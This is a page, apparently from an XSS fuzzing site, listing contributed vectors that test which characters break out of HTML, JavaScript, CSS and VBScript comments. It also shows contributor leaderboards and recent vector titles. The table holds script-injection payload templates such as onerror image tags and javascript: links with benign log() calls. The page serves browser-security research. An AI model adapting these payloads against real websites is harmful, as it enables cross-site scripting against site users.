Featured vector

No vectors found in the last 30 days

Fuzz vector cloud

5,456,921 Successful fuzzes

Fuzz Vectors

Searching for "Comments"

Your browser identified as

General Crawlers unknown

All vectors

Description	Vector	Created by
Characters that close a HTML comment 4	<!-- --chr> <img src=xxx:x onerror=log(num)> -->	@irsdl
Things that break from URIs javascript comments	<a href="javascript://chrlogChr(num)">aaa</a>	@0xAli
Characters that escape JavaScript single line comments	<script> // hmm chrlogChr(num) </script>	@peksa
Characters that close a HTML comment 0021	<!--chr><img src=xxx:x onerror=log(num)> -->	@matttiko
Characters to break VBScript comments	<script language="vbscript"> 'chrlog(num)' </script>	@0x6D6172696F
Characters allowed in between dashes to end html comments	<!-- -chr-> <script>logChr(num)</script> -->	@JohnathanKuskos
Characters that close a HTML comment 3	--><!-- -chr-> <img src=xxx:x onerror=log(num)> -->	@DOMXss
Hex characters allowed after asterix in CSS comments	<div id="fuzzelementnum" style="/*\hex2*/;color:#000000;"></div>	@garethheyes
Characters allowed after asterix in CSS comments	<div id="fuzzelementnum" style="/**chr/;color:#000000;"></div>	@garethheyes
Characters that close a HTML comment 002	<!--chr<img src=xxx:x onerror=log(num)> -->	@0x6D6172696F
Characters escaping JS comment delimiters 001	<script>/* *chr/log(num)// */</script>	@0x6D6172696F
Characters that close JS Comments	'"`><script>/* *chrlog(num)// */</script>	@garethheyes
Characters that close a HTML comment	--><!-- --chr> <img src=xxx:x onerror=log(num)> -->	@garethheyes

Top fuzzers
insertScript (387)
garethheyes (256)
0x6D6172696F (51)
JohnathanKuskos (46)
heyheyheyhey10 (43)
tifkin_ (42)
palindrom (38)
i_bo0om (36)
Giutro (35)
albinowax (33)
0xAli (33)
jackmasa (33)
avlidienbrunn (30)
mramydnei1 (24)
peksa (21)
skeptic_fx (19)
D_Szameitat (19)
shafigullin (17)
irsdl (16)
goergr1 (15)

New users
deepsk79
agasfasgasdasds
the_yellow_fall
dovanson91
June_Dion
daige13
fall17691353
summer_poc
ketchupandbeer
jogibharat
palindrom
fubbp
sanjayrk143
bmantra
cnet62
sharath_unni
juliokurt
L0TExp
d0znpp
pnig0s

Popular recent vectors
Comma analog in script src data

Latest vectors
Comma analog in script src data
slash bla htest
random test
Characters that eat JavaScript regex escapes
Characters that modify JavaScript regex character classes
test all
XSS Without Space Test 1
kinmens test
Single characters that break attribute names
Characters that expands the URL length (host no xn)

© 2017 Copyright Gareth Heyes